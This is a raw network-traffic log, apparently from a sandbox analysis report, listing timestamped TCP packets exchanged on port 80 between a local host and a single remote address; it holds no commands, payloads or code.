Oct 13, 2023 15:20:55.283447981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283498049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.283528090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283601046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283652067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.283690929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283767939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283813953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.283869982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283926964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.283976078 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.284032106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284082890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284128904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.284313917 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284365892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284410954 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.284418106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284452915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284492016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.284547091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284660101 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284725904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.284754992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284833908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.284898043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.284926891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285011053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285058975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.285063982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285104036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285146952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.285168886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285249949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285300970 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.285309076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285376072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285433054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.285473108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285558939 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285608053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.285623074 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285720110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285768032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.285806894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285924911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.285970926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.286010981 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286087036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286103964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286134958 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.286147118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286196947 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.286225080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286299944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286343098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.286381006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286698103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286741972 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.286781073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286815882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286869049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.286904097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286938906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.286997080 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.287036896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287112951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287159920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.287169933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287226915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287275076 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.287276030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287391901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287444115 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.287481070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287573099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287621975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.287678957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287708998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287745953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287760019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.287796974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287816048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287846088 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.287904978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287955046 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.287955999 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.288026094 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288075924 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.288115978 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288244009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288295031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.288388968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288479090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288523912 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.288562059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288599014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288647890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.288666964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288769007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288817883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288819075 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.288880110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288899899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.288932085 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.288969994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289021969 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.289060116 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289153099 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289201021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.289233923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289320946 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289371967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.289396048 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289457083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289510012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.289541006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289561033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289606094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.289647102 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289748907 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289800882 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.289839029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289875984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.289923906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.289966106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290046930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290098906 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.290127039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290194988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290241957 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.290256023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290324926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290374994 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.290397882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290477991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290534973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.290616989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290719986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290770054 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.290795088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290872097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.290920973 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.290951967 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291045904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291096926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.291116953 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291201115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291256905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.291275024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291356087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291376114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291418076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291421890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.291456938 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.291500092 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291619062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291666031 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.291682005 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291765928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291815996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.291822910 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291867971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.291915894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.291977882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292015076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292057037 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.292079926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292150974 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292223930 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.292226076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292247057 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292289019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.292454958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292525053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292582035 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.292623043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292680025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292730093 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.292759895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292809010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292860985 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.292874098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.292956114 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293010950 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.293040037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293131113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293180943 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.293199062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293240070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293287039 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293287039 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.293376923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293437958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293447971 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.293489933 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293538094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.293593884 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293646097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293685913 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.293729067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293802023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293819904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293854952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.293896914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293932915 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.293952942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.294009924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294064045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294076920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.294125080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294181108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.294212103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294284105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294325113 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.294348955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294440031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294495106 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.294537067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294614077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294662952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.294722080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294825077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294881105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.294919968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.294956923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.295007944 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.295032024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.295068026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.295115948 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.295123100 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.295192003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.295237064 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.295238018 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.295305014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.295346975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.616828918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.616930008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.616970062 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617006063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617041111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617077112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617113113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617130995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617130995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617130995 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617149115 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617223024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617295980 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617367029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617430925 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617434025 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617531061 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617587090 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617593050 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617623091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617679119 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617696047 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617764950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617799997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617819071 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617877007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617913008 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.617939949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.617983103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618042946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.618098021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618135929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618187904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.618227959 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618264914 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618299961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618320942 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.618403912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618458986 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618465900 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.618494987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.618541956 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.618562937 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619277954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619335890 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.619380951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619417906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619462013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.619484901 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619602919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619664907 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.619687080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619852066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619919062 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.619946957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.619983912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620029926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.620053053 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620129108 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620176077 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.620213985 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620249987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620301008 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.620357037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620425940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620462894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620479107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.620537043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620573997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620585918 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.620609999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620656967 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.620678902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620815992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.620868921 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.620919943 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621078014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621129036 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.621166945 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621233940 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621282101 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.621371984 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621429920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621479034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.621568918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621604919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621654034 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.621707916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621776104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621813059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.621824980 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622118950 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622173071 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622209072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622246027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:55.622297049 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:55.622312069 CEST	80	49721	91.215.85.17	192.168.2.5
